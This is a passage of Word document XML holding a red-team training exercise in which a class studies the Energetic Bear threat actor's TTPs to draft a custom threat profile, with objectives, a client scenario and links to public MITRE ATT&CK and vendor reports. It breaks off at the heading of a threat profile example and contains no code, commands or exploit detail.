        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215CF7B7" w14:textId="77777777" w:rsidR="00214945" w:rsidRPr="00BB5008" w:rsidRDefault="00214945" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F7A543C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:caps/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:caps/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DECOMPOSING A THREAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FE7AA7" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DESCRIPTION</w:t>
      </w:r>
      <w:hyperlink r:id="rId156" w:anchor="description" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27B45859" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a group exercise. As a class, we will examine the Energetic Bear threat actor to build a threat profile that can be used during a Red Team </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>engagement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4CAE1597" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OBJECTIVES</w:t>
      </w:r>
      <w:hyperlink r:id="rId157" w:anchor="objectives" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D7F11BB" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Review the Energetic Bear threat actor’s TTPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED7FE8A" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use the information to create a threat that is similar and can be used to support future Red Team engagements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4CB22C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete a threat </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>profile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C5C2B1C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INSTRUCTIONS</w:t>
      </w:r>
      <w:hyperlink r:id="rId158" w:anchor="instructions" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16EEA4F2" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use the Energetic Bear material provided for reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3A8E3C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Modify and adjust the profile to fit your scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6F8816" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:caps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:caps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC48A3C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>This is one of the more difficult exercises to complete. It is not technically difficult, but dives into threat emulation design that many have not explored. There is no right or wrong answer. The exploration and process of decomposing a threat is the most valuable aspect of the exercise. Practice is the best way to understand this process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7FC41" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SCENARIO</w:t>
      </w:r>
      <w:hyperlink r:id="rId159" w:anchor="scenario" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74954F5B" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">A client has asked your Red Team to emulate a specific threat. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Specifically</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> they are interested in the attacks by Energetic Bear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F125F1B" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED74AD4" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">As professional Red Team, you understand that emulating a specific threat actor is not easy or feasible. Instead of redesigning Energetic Bear, you understand focus should be on the emulation of a threat’s TTPs. This is more valuable that emulating a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">specific threat actor. The goal is not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Energetic Bear threat actor but to create a threat profile document using Energetic Bear as inspiration. You will use research on Energetic Bear's TTPs to build out a custom threat profile that is technically feasible and can be used to engage the target with realistic threat TTPs. A complete threat profile will contain details that can be used to plan and design the execution of a threat against a target. These are typically deployed as a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>command and control</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> channel. We will discuss command and control in more detail later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445E6D73" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Use Energetic Bear references, MITRE, ATT&amp;CK, personal experience, and intuition to develop the profile. Remember, this is your interpretation of a threat using a specific threat actor as inspiration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7599A4B9" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22514625" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId160" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK Framework</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId161" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/wiki/Main_Page</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22FCB383" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId162" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK Navigator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId163" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/wiki/ATT%26CK_Navigator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="537F79A9" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId164" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Dragonfly: Cyberespionage Attacks Against Energy Suppliers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId165" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C6B36C3" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId166" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Energetic Bear – Crouching Yeti</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId167" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/58/2018/03/09092926/EB-YetiJuly2014-Public.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1820C609" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId168" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>The Alley of Compromise</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId169" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.crowdstrike.com/blog/cve-2014-1761-alley-compromise</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C5A1007" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>THREAT PROFILE EXAMPLE</w:t>
      </w:r>
      <w:hyperlink r:id="rId170" w:anchor="threat-profile-example" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
